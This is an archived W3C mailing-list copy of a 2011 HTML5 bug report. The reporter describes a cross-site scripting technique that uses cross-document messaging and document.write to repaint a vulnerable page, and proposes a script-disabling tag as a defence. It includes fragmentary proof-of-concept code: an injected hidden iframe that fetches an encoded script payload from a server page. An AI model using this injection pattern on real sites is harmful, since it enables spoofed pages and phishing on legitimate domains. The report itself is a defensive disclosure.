W3C home > Mailing lists > Public > public-html@w3.org > April 2011

[Bug 12469] New: Dynamic Cross-Site Scripting and Page Repainting

From: <bugzilla@jessica.w3.org>
Date: Mon, 11 Apr 2011 10:02:41 +0000
To: public-html@w3.org
Message-ID: <bug-12469-2495@http.www.w3.org/Bugs/Public/>

           Summary: Dynamic Cross-Site Scripting and Page Repainting
           Product: HTML WG
           Version: unspecified
          Platform: All
        OS/Version: All
            Status: NEW
          Severity: critical
          Priority: P2
         Component: HTML5 spec (editor: Ian Hickson)
        AssignedTo: ian@hixie.ch
        ReportedBy: simon.young90@live.com
         QAContact: public-html-bugzilla@w3.org
                CC: mike@w3.org, public-html-wg-issue-tracking@w3.org,

It has come to my attention in my studies that the addition of cross-document
messaging in HTML5 allows a new, dynamic form of cross-site scripting to be
developed, employing legitimate communications between injected content. By
accompanying this with the document.wrtie() function, this could then be used
to dynamically control “repaint” the entire content of a webpage vulnerable to
code injection. A website could then be completely simulated by the XSS attack
while still residing on a legitimate domain, a man-in-the-middle blue-pill esk

In this example, dynamically served code is appended to the original page,
removing document.getElementsByTagName('html')[0].innerHTML will allow the page
to be completely changed:

>>>>>Injected Code:

<iframe id="mommy" src="URL" style="visibility:hidden; height:0;
    window.addEventListener ("message", recvPayload, false);

    function recvPayload (event) {
        document.write(document.getElementsByTagName('html')[0].innerHTML +

    function requestPayload () {
        var frame = document.getElementById ("mommy");
        frame.contentWindow.postMessage ("baby wants milk!", "*");
<a href="" onClick="requestPayload ()"> <!-- clickjacking -->

>>>>Server Page:

    window.addEventListener ("message", sendPayload, false);

    payload = ("%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%44%79%6E%61%6D"+

    function sendPayload (event) {
        event.source.postMessage (payload, event.origin);

I propose the addition of a tag which, disables any script within its bounds
perhaps along the lines of.. <plaintext></plaintext> this would allow web
developers to disable areas of a page from using script, blocking XSS attacks.

I would appreciate your thoughts on this.

Many Thanks,
Simon Young

Configure bugmail: http://www.w3.org/Bugs/Public/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are on the CC list for the bug.
Received on Monday, 11 April 2011 10:02:44 UTC

This archive was generated by hypermail 2.4.0 : Saturday, 9 October 2021 18:45:36 UTC